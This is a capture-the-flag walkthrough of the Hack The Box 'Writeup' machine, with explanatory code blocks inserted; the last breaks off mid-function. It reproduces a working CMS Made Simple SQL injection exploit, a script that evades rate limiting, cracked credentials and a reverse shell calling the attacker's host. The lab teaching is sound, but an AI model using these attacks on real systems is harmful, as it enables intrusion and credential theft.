
Writeup

Machine Name: Writeup - HTB
Level: Medium
OS: Linux

Walkthrough

nmap scan:


┌──(root💀kali)-[~]                                                                            
└─# nmap -p- -A -T4 10.10.10.138                                                               
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-03 18:36 EDT                                
Stats: 0:01:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan                
SYN Stealth Scan Timing: About 96.12% done; ETC: 18:37 (0:00:04 remaining)                     
Stats: 0:01:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                     
NSE Timing: About 93.14% done; ETC: 18:37 (0:00:00 remaining)                                  
Nmap scan report for 10.10.10.138                                                              
Host is up (0.069s latency).                                                                   
Not shown: 65533 filtered ports                                                                
PORT   STATE SERVICE VERSION                                                                   
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)                             
| ssh-hostkey:                                                                                 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)                                 
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)                                
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)                              
80/tcp open  http    Apache httpd 2.4.25 ((Debian))                                            
| http-robots.txt: 1 disallowed entry                                                          
|_/writeup/                                                                                    
|_http-server-header: Apache/2.4.25 (Debian)                                                   
|_http-title: Nothing here yet.                                                                
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 
(92%), Linux 4.4 (92%), Linux 4.8 (92%)                                                        
No exact OS matches for host (test conditions non-ideal).                                      
Network Distance: 2 hops                                                                       
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                        

TRACEROUTE (using port 22/tcp)                                                                 
HOP RTT      ADDRESS                                                                           
1   68.76 ms 10.10.14.1                                                                        
2   68.83 ms 10.10.10.138                                                                      

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.78 seconds      

Seeing port 80 open, I was about to start scanning it, but I noticed that the port gets closed once a certain amount of scanning has been done: the service goes down for a while and then comes back up. That is bad news, because it means I cannot use tools like dirb or gobuster. I then opened the page in a browser. It says a DoS protection mechanism is in place, and that when 40x errors are generated it treats this as a DoS attack and stops the service for a period of time. So first I pulled every word from the page and built a wordlist from them.


┌──(root💀kali)-[~/10.10.10.138]
└─# cewl --lowercase --with-numbers -d 3 http://10.10.10.138/ -w wordlist

Then I wrote a Python script. Whenever the server shut itself down because of the 404s, the script waits for a while and then carries on with the file and directory enumeration. The code is given below.


┌──(root💀kali)-[~/10.10.10.138]
└─# cat exploit/dirbb.py
import time
import requests

path = input("Wordlist file:\r\n")
with open(path) as dosya:
    wordlist = dosya.read().split("\n")

dizi200 = []
url = "http://10.10.10.138/"
sayac = 0
for i in wordlist:
    sayac = sayac + 1
    try:
        r = requests.get(url + i)
        # status_code is an int; comparing it with the string "200" never matched,
        # so nothing was ever collected in dizi200
        if r.status_code == 200:
            dizi200.append(url + i)
        url_ = url + i
        print(url_, r.status_code)
    except requests.exceptions.RequestException:
        # connection refused / timed out: the ban kicked in, wait for the service to come back
        print("Caught by the DoS protection, waiting!")
        time.sleep(60)
    # pause after every 5 requests to stay under the 40x ban threshold, and show the hits so far
    if sayac == 5:
        time.sleep(10)
        sayac = 0
        print("---------------")
        for ii in dizi200:
            print(ii)
        print("---------------")

┌──(root💀kali)-[~/10.10.10.138]
└─# python3 exploit/dirbb.py  
...
...
http://10.10.10.138/apache 404                                                                                                                                                                
http://10.10.10.138/40x 404                                                                                                                                                                   
http://10.10.10.138/errors 404                                                                                                                                                                
http://10.10.10.138/bans 404                                                                                                                                                                  
---------------                                                                                                                                                                               
---------------                                                                                                                                                                               
Caught by the DoS protection, waiting!
Caught by the DoS protection, waiting!
http://10.10.10.138/hope 404                                                                                                                                                                  
http://10.10.10.138/get 404                                                                                                                                                                   
http://10.10.10.138/hit 404                                                                                                                                                                   
---------------                                                                                                                                                                               
---------------                                                                                                                                                                               
http://10.10.10.138/false 404                                                                                                                                                                 
http://10.10.10.138/positive 404                                                                                                                                                              
http://10.10.10.138/drops 404                                                                                                                                                                 
http://10.10.10.138/where 404                                                                                                                                                                 
http://10.10.10.138/download 404                                                                                                                                                              
---------------                                                                                                                                                                               
---------------                                                                                                                                                                               
http://10.10.10.138/the 404                                                                                                                                                                   
http://10.10.10.138/proper 404                                                                                                                                                                
http://10.10.10.138/donkey 404                                                                                                                                                                
http://10.10.10.138/please 404                                                                                                                                                                
http://10.10.10.138/let 404                                                                                                                                                                   
---------------                                                                                                                                                                               
---------------                                                                                                                                                                               
http://10.10.10.138/via 404                                                                                                                                                                   
http://10.10.10.138/mail 404                                                                                                                                                                  
http://10.10.10.138/jkr 404                                                                                                                                                                   
http://10.10.10.138/writeup 200    
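As an added example (not the post's own script, and not the target's real configuration), here is the same idea carried one step further: instead of pausing after a fixed number of requests, the client keeps its own count of recent 40x responses and sleeps before it would reach the ban threshold, and it treats a connection failure as "banned", backs off and retries the same path. The banning server, its assumed threshold of 5 errors in 60 seconds with a 120-second ban, the virtual clock and the candidate list are all constructed here so the demo runs offline; for real use you would pass `time.time`, `time.sleep` and a `requests`-based fetch that returns `None` on `RequestException`.

```python
import time
from collections import deque
from typing import Callable, Deque, Dict, Iterable, Optional, Tuple


class FakeClock:
    """Virtual clock so the demo runs instantly offline; use time.time/time.sleep for real targets."""
    def __init__(self) -> None:
        self.now = 0.0

    def time(self) -> float:
        return self.now

    def sleep(self, seconds: float) -> None:
        self.now += seconds


class BanningServer:
    """Constructed stand-in for the target's protection (limit/window/ban_time are assumptions,
    not the box's real settings): after `limit` 40x responses inside `window` seconds the
    client is banned for `ban_time` seconds, during which every request fails at the TCP
    level (modelled as returning None, the case where requests raises an exception)."""

    def __init__(self, existing: Iterable[str], clock: FakeClock,
                 limit: int = 5, window: float = 60.0, ban_time: float = 120.0) -> None:
        self.existing = set(existing)
        self.clock = clock
        self.limit, self.window, self.ban_time = limit, window, ban_time
        self.errors: Deque[float] = deque()
        self.banned_until = 0.0
        self.bans = 0

    def get(self, path: str) -> Optional[int]:
        now = self.clock.time()
        if now < self.banned_until:
            return None
        if path in self.existing:
            return 200
        self.errors.append(now)
        while self.errors and self.errors[0] < now - self.window:
            self.errors.popleft()
        if len(self.errors) >= self.limit:
            self.banned_until = now + self.ban_time
            self.bans += 1
            self.errors.clear()
        return 404


def enumerate_paths(paths: Iterable[str], fetch: Callable[[str], Optional[int]],
                    now: Callable[[], float], sleep: Callable[[float], None],
                    max_40x: int = 4, window: float = 60.0,
                    backoff: float = 60.0) -> Dict[str, int]:
    """Directory brute force that counts its own recent 40x responses and sleeps before it
    would cross the ban threshold; a None result (connection refused) means the ban hit
    anyway, so back off and retry the same path instead of skipping it."""
    recent_40x: Deque[float] = deque()
    hits: Dict[str, int] = {}
    for path in paths:
        while True:
            t = now()
            while recent_40x and recent_40x[0] <= t - window:
                recent_40x.popleft()
            if len(recent_40x) >= max_40x:
                sleep(recent_40x[0] + window - t + 0.001)  # let the oldest 40x age out
                continue
            status = fetch(path)
            if status is None:
                sleep(backoff)
                continue
            if 400 <= status < 500:
                recent_40x.append(now())
            else:
                hits[path] = status
            break
    return hits


def run_demo(max_40x: int) -> Tuple[Dict[str, int], int, float]:
    """Run the enumerator against the simulated server: (hits, bans incurred, virtual seconds)."""
    clock = FakeClock()
    server = BanningServer(existing=["writeup"], clock=clock)
    # Constructed candidate list in the spirit of the cewl wordlist; only /writeup exists.
    candidates = ["apache", "errors", "bans", "hope", "drops", "mail", "writeup", "jkr"]
    hits = enumerate_paths(candidates, server.get, clock.time, clock.sleep, max_40x=max_40x)
    return hits, server.bans, clock.now


if __name__ == "__main__":
    for budget in (5, 4):  # 5 = naive, walks into the ban; 4 = stays one under the limit
        print(budget, run_demo(budget))
```

With a budget of 4 the run finds /writeup without ever being banned; with a budget equal to the server's limit it still finds /writeup, but only after eating the full ban time, which is the difference the author's fixed pause-every-5-requests loop tries to approximate by hand.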

I got a 200 status code for http://10.10.10.138/writeup. When I visited the page and inspected its source, I saw the phrase CMS Made Simple in the title. I then searched for a published exploit for it.


└─# searchsploit CMS Made Simple
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)                                                                          | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting                                                                                                     | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion                                                                                                     | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting                                                                                                  | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                                                                                                      | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities                                                                                     | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities                                                                                                           | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                                                                                                                 | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                                                                                        | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                                                                                            | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                                                                                                                | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                                                                                                               | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting                                                                                         | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities                                                                                                            | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery                                                                                                            | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion                                                                                               | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery                                                                                     | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection                                                                              | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities                                                                                                            | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                                                                                                               | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                                                                                              | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                                                                                                | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)                                                                                    | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)                                                                                                 | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                                                                                                                | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)                                                                    | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                                                                                               | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                                                                                               | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning                                                                                             | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                                                                                                                    | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                                                                                            | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                                                                                       | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload                                                                              | php/webapps/46546.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

I found the SQL injection exploit (php/webapps/46635.py, CVE-2019-9053), but I had to modify the Python file: it was written for Python 2 and the program crashed while cracking the password. The edited version is given below.
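Before the listing, an added example of how that exploit actually recovers the salt and password; this is illustration code, not part of the original post or of 46635.py. The exploit asks the database, for each candidate prefix, whether `sitepref_value LIKE '<prefix>%'` for the `sitemask` row (the prefix is hex-encoded and followed by `0x25`, the `%` wildcard) and reads the answer from whether the request took at least TIME seconds; once the salt is known, the admin hash is matched offline against `md5(salt + candidate)`. Here the timing oracle is replaced by an in-memory prefix check, and the salt, password, hash and wordlist are constructed, so the block runs without a target.

```python
import hashlib
from typing import Callable, Iterable, Optional

# Character set the exploit iterates over for each position (same as in 46635.py).
CHARSET = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'


def build_payload(prefix: str, time_s: int = 1) -> str:
    """Build the m1_idlist payload the exploit sends for one candidate salt prefix.

    The prefix is hex-encoded and suffixed with 0x25 ('%'), so MySQL evaluates
    sitepref_value LIKE 'prefix%' and sleep() fires only when the guess is a true prefix.
    """
    hex_prefix = prefix.encode().hex()
    return ("a,b,1,5))+and+(select+sleep(" + str(time_s)
            + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + hex_prefix
            + "25+and+sitepref_name+like+0x736974656d61736b)+--+")


def extract_with_prefix_oracle(oracle: Callable[[str], bool],
                               charset: str = CHARSET,
                               max_len: int = 64) -> str:
    """Recover a secret one character at a time from a boolean prefix oracle.

    oracle(candidate) must return True iff the secret starts with candidate; the
    exploit realises this as "did the request take at least TIME seconds".
    """
    found = ""
    while len(found) < max_len:
        for ch in charset:
            if oracle(found + ch):
                found += ch
                break
        else:
            # No character extends the prefix: the secret is complete
            # (or it contains a character outside the charset).
            return found
    return found


def crack_cmsms_hash(salt: str, target_md5: str, wordlist: Iterable[str]) -> Optional[str]:
    """CMSMS stores md5(salt + password); test each candidate offline, as the exploit does."""
    for word in wordlist:
        word = word.rstrip("\n")
        if hashlib.md5((salt + word).encode()).hexdigest() == target_md5:
            return word
    return None


# --- Constructed demo data (hypothetical values, not taken from the target) ---
DEMO_SALT = "5a599ef579066807"
DEMO_PASSWORD = "Winter2021"
DEMO_HASH = hashlib.md5((DEMO_SALT + DEMO_PASSWORD).encode()).hexdigest()
DEMO_WORDLIST = ["password", "admin123", "Winter2021", "letmein"]


def demo_oracle(candidate: str) -> bool:
    """Stand-in for the timing oracle: True when the guess is a prefix of the salt."""
    return DEMO_SALT.startswith(candidate)


def run_demo() -> tuple:
    """Extract the salt through the oracle, then crack the hash with the wordlist."""
    salt = extract_with_prefix_oracle(demo_oracle)
    cracked = crack_cmsms_hash(salt, DEMO_HASH, DEMO_WORDLIST)
    return salt, cracked


if __name__ == "__main__":
    s, p = run_demo()
    print("salt:", s)
    print("payload for the first guess:", build_payload(s[:1]))
    print("cracked:", p)
```

The reason the exploit needs TIME tuned to the target (its own usage text says so) is visible in the oracle: a slow or rate-limited server makes an innocent request look like a sleep() hit, and a single false positive corrupts every later character, since each guess is built on the prefix recovered so far.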


┌──(root💀kali)-[~/10.10.10.138/exploit]                                                                                                                                                      
└─# cat 46635.py                                                                                                                                                                              
#!/usr/bin/env python                                                                                                                                                                         
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9                                                                                                                    
# Date: 30-03-2019                                                                                                                                                                            
# Exploit Author: Daniele Scanu @ Certimeter Group                                                                                                                                            
# Vendor Homepage: https://www.cmsmadesimple.org/                                                                                                                                             
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/                                                                                                                               
# Version: <= 2.2.9                                                                                                                                                                           
# Tested on: Ubuntu 18.04 LTS                                                                                                                                                                 
# CVE : CVE-2019-9053                                                                                                                                                                         

import requests                                                                                                                                                                               
from termcolor import colored                                                                                                                                                                 
import time                                                                                                                                                                                   
from termcolor import cprint                                                                                                                                                                  
import optparse                                                                                                                                                                               
import hashlib                                                                                                                                                                                

parser = optparse.OptionParser()                                                                                                                                                              
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")   
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)                                                                  

options, args = parser.parse_args()                                                                                                                                                           
if not options.url:                                                                                                                                                                           
    print("[+] Specify an url target")                                                                                                                                                        
    print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")                                                                                                        
    print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")                                                                            
    print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")                                                                                
    exit()                                                                                                                                                                                    

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'                                                                                                                       
session = requests.Session()                                                                                                                                                                  
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'                                                                                                            
flag = True                                                                                                                                                                                   
password = ""                                                                                                                                                                                 
temp_password = ""                                                                                                                                                                            
TIME = 1                                                                                                                                                                                      
db_name = ""                                                                                                                                                                                  
output = ""                                                                                                                                                                                   
email = ""                                                                                                                                                                                    

salt = ''                                                                                                                                                                                     
wordlist = ""                                                                                                                                                                                 
if options.wordlist:                                                                                                                                                                          
    wordlist += options.wordlist                                                                                                                                                              

def crack_password():                                                                                                                                                                         
    global password                                                                                                                                                                           
    global output                                                                                                                                                                             
    global wordlist                                                                                                                                                                           
    global salt                                                                                                                                                                               
    dict = open(wordlist, encoding='latin-1')                                                                                                                                                 
    for line in dict.readlines():                                                                                                                                                             
        line = line.replace("\n", "")                                                                                                                                                         
        beautify_print_try(line)                                                                                                                                                              
        if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:                                                                                                     
            output += "\n[+] Password cracked: " + line                                                                                                                                       
            break                                                                                                                                                                             
    dict.close()                                                                                                                                                                              

def beautify_print_try(value):                                                                                                                                                                
    global output   
    print("\033c")
    cprint(output,'green', attrs=['bold'])                                                                                                                                                    
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])                                                                                                                                        

def beautify_print():                                                                                                                                                                         
    global output                                                                                                                                                                             
    print("\033c")                                                                                                                                                                            
    cprint(output,'green', attrs=['bold'])                                                                                                                                                    

def dump_salt():                                                                                                                                                                              
    global flag                                                                                                                                                                               
    global salt                                                                                                                                                                               
    global output                                                                                                                                                                             
    ord_salt = ""                                                                                                                                                                             
    ord_salt_temp = ""                                                                                                                                                                        
    while flag:                                                                                                                                                                               
        flag = False                                                                                                                                                                          
        for i in range(0, len(dictionary)):                                                                                                                                                   
            temp_salt = salt + dictionary[i]                                                                                                                                                  
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]                                                                                                                            
            beautify_print_try(temp_salt)                                                                                                                                                     
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"  
            url = url_vuln + "&m1_idlist=" + payload                                                                                                                                          
            start_time = time.time()                                                                                                                                                          
            r = session.get(url)                                                                                                                                                              
            elapsed_time = time.time() - start_time                                                                                                                                           
            if elapsed_time >= TIME:                                                                                                                                                          
                flag = True                                                                                                                                                                   
                break                                                                                                                                                                         
        if flag:                                                                                                                                                                              
            salt = temp_salt                                                                                                                                                                  
            ord_salt = ord_salt_temp                                                                                                                                                          
    flag = True                                                                                                                                                                               
    output += '\n[+] Salt for password found: ' + salt                                                                                                                                        

def dump_password():                                                                                                                                                                          
    global flag                                                                                                                                                                               
    global password                                                                                                                                                                           
    global output                                                                                                                                                                             
    ord_password = ""                                                                                                                                                                         
    ord_password_temp = ""                                                                                                                                                                    
    while flag:                                                                                                                                                                               
        flag = False     
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]                                                                                                                                          
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]                                                                                                                    
            beautify_print_try(temp_password)                                                                                                                                                 
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"                                                                                                         
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"                                                                                        
            url = url_vuln + "&m1_idlist=" + payload                                                                                                                                          
            start_time = time.time()                                                                                                                                                          
            r = session.get(url)                                                                                                                                                              
            elapsed_time = time.time() - start_time                                                                                                                                           
            if elapsed_time >= TIME:                                                                                                                                                          
                flag = True                                                                                                                                                                   
                break                                                                                                                                                                         
        if flag:                                                                                                                                                                              
            password = temp_password                                                                                                                                                          
            ord_password = ord_password_temp                                                                                                                                                  
    flag = True                                                                                                                                                                               
    output += '\n[+] Password found: ' + password                                                                                                                                             

def dump_username():                                                                                                                                                                          
    global flag                                                                                                                                                                               
    global db_name                                                                                                                                                                            
    global output                                                                                                                                                                             
    ord_db_name = ""                                                                                                                                                                          
    ord_db_name_temp = ""                                                                                                                                                                     
    while flag:                                                                                                                                                                               
        flag = False                                                                                                                                                                          
        for i in range(0, len(dictionary)):                                                                                                                                                   
            temp_db_name = db_name + dictionary[i]                                                                                                                                            
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]                                                                                                                      
            beautify_print_try(temp_db_name)                                                                                                                                                  
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"                             
            url = url_vuln + "&m1_idlist=" + payload                                                                                                                                          
            start_time = time.time()                                                                                                                                                          
            r = session.get(url)                                                                                                                                                              
            elapsed_time = time.time() - start_time                                                                                                                                           
            if elapsed_time >= TIME:                                                                                                                                                          
                flag = True                                                                                                                                                                   
                break                                                                                                                                                                         
        if flag:                                                                                                                                                                              
            db_name = temp_db_name         
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True

def dump_email():
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True

dump_salt()
dump_username()
dump_email()
dump_password()

if options.cracking:
    print(colored("[*] Now try to crack password"))
    crack_password()

beautify_print()

When I ran the script, I got the output below.


#[+] Salt for password found: 5a599ef579066807
#[+] Username found: jkr
#[+] Email found: [email protected]
#[+] Password found: 62def4866937f08cc13bab43bb14e6f7

Afterwards I saved the hash-cracking part of the script as a separate Python script and did the cracking myself. The Python code is given below.

import hashlib

def crack_password():
    password = "62def4866937f08cc13bab43bb14e6f7"   # password hash dumped from cms_users
    wordlist = "/usr/share/wordlists/rockyou.txt"
    salt = "5a599ef579066807"                      # sitemask value dumped from cms_siteprefs
    # stream the wordlist line by line instead of loading it all with readlines()
    with open(wordlist, encoding="latin-1") as words:
        for line in words:
            line = line.rstrip("\n")
            # CMS Made Simple stores md5(salt + password)
            if hashlib.md5(salt.encode() + line.encode()).hexdigest() == password:
                print("\n[+] Password cracked: " + line)
                return line
    return None

crack_password()

┌──(root💀kali)-[~/10.10.10.138/exploit]                                                       
└─# python3 crack.py

[+] Password cracked: raykayjay9

When I connected over SSH, I read the user flag.


┌──(root💀kali)-[~]
└─# ssh [email protected]                   
[email protected]'s password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ pwd
/home/jkr
jkr@writeup:~$ ls
user.txt
jkr@writeup:~$ cat user.txt
846446f10caff03660d3ef24705e13ec
jkr@writeup:~$ 

I carried out a number of checks on the box; in my view we should have been able to get root by using the Python libraries, but it did not work. I really do not understand why. Anyway...

I uploaded the pspy tool to the machine and started watching the processes.


jkr@writeup:/tmp$ wget http://10.10.14.21/pspy32s
--2021-10-04 18:38:52--  http://10.10.14.21/pspy32s
Connecting to 10.10.14.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1090528 (1.0M) [application/octet-stream]
Saving to: ‘pspy32s’

pspy32s                 100%[==============================>]   1.04M   559KB/s    in 1.9s    

2021-10-04 18:38:54 (559 KB/s) - ‘pspy32s’ saved [1090528/1090528]

jkr@writeup:/tmp$ chmod 777 pspy32s

The processes that appeared when I made an SSH connection are given below.


2021/10/04 18:40:01 CMD: UID=0    PID=2059   | /usr/sbin/CRON 
2021/10/04 18:40:01 CMD: UID=0    PID=2060   | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1 
2021/10/04 18:40:05 CMD: UID=0    PID=2061   | sshd: [accepted]
2021/10/04 18:40:05 CMD: UID=0    PID=2062   | sshd: [accepted]  
2021/10/04 18:40:09 CMD: UID=0    PID=2063   | sshd: jkr [priv]  
2021/10/04 18:40:09 CMD: UID=0    PID=2064   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
2021/10/04 18:40:09 CMD: UID=0    PID=2065   | run-parts --lsbsysinit /etc/update-motd.d 
2021/10/04 18:40:09 CMD: UID=0    PID=2066   | /bin/sh /etc/update-motd.d/10-uname 
2021/10/04 18:40:09 CMD: UID=0    PID=2067   | sshd: jkr [priv]  

As can be seen, the program named run-parts is executed without a path being specified.

Looking at PATH:


jkr@writeup:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

And looking at the paths we can write to:

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
  Group jkr:
/tmp/linpeas.sh
  Group cdrom:

  Group floppy:

  Group audio:

  Group dip:

  Group video:

  Group plugdev:

  Group staff:
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/ca-certificates
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin

We can see that PATH can be manipulated. Let's create a reverse shell and become root.


jkr@writeup:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
jkr@writeup:/tmp$ cd /usr/local/bin
jkr@writeup:/usr/local/bin$ touch run-parts
jkr@writeup:/usr/local/bin$ nano run-parts
jkr@writeup:/usr/local/bin$ cat run-parts
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

jkr@writeup:/usr/local/bin$ chmod 777 run-parts
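As an added example (not code from the original post, pspy or linpeas), the following Python script checks a cron or MOTD command line like the one pspy recorded for the PATH-hijack condition this step relies on: it resolves the command the way the shell would and reports every preceding PATH directory that is group- or world-writable. The `root` parameter and `build_constructed_tree()` are assumptions added so the check runs against a constructed tree mirroring the box (staff-writable /usr/local/sbin and /usr/local/bin, real /bin/run-parts) instead of the live filesystem.

```python
import os
import shlex
import stat
import tempfile

# Added example (not from the post, pspy or linpeas): resolve a command the
# way the shell does and flag group/world-writable PATH entries that precede
# the real binary. `root` is an assumed parameter for testing on a constructed tree.

def parse_env_invocation(cmdline):
    """Return (PATH value, command) from an `[sh -c] env [-i] NAME=VAL... cmd ...` line."""
    argv = shlex.split(cmdline)
    if len(argv) >= 2 and os.path.basename(argv[0]) == "sh" and argv[1] == "-c":
        argv = argv[2:]                     # pspy prints the sh -c wrapper too
    if not argv or os.path.basename(argv[0]) != "env":
        return None, None                   # not an env invocation
    path_value, command = None, None
    for tok in argv[1:]:
        if tok.startswith("-"):
            continue                        # env options such as -i
        if "=" in tok:
            name, value = tok.split("=", 1)
            if name == "PATH":
                path_value = value
            continue                        # environment assignment
        command = tok                       # first plain word is the command
        break
    return path_value, command

def audit_path_for_command(command, path_value, root="/"):
    """List PATH dirs that are group/world-writable and searched before the real binary."""
    resolved, shadowing = None, []
    for d in [p for p in path_value.split(":") if p]:
        real_dir = os.path.join(root, d.lstrip("/"))   # root != "/" only in tests
        candidate = os.path.join(real_dir, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            resolved = d.rstrip("/") + "/" + command
            break                           # the shell stops at the first hit
        if os.path.isdir(real_dir):
            mode = os.stat(real_dir).st_mode
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                shadowing.append(d)         # writable dir searched before the real one
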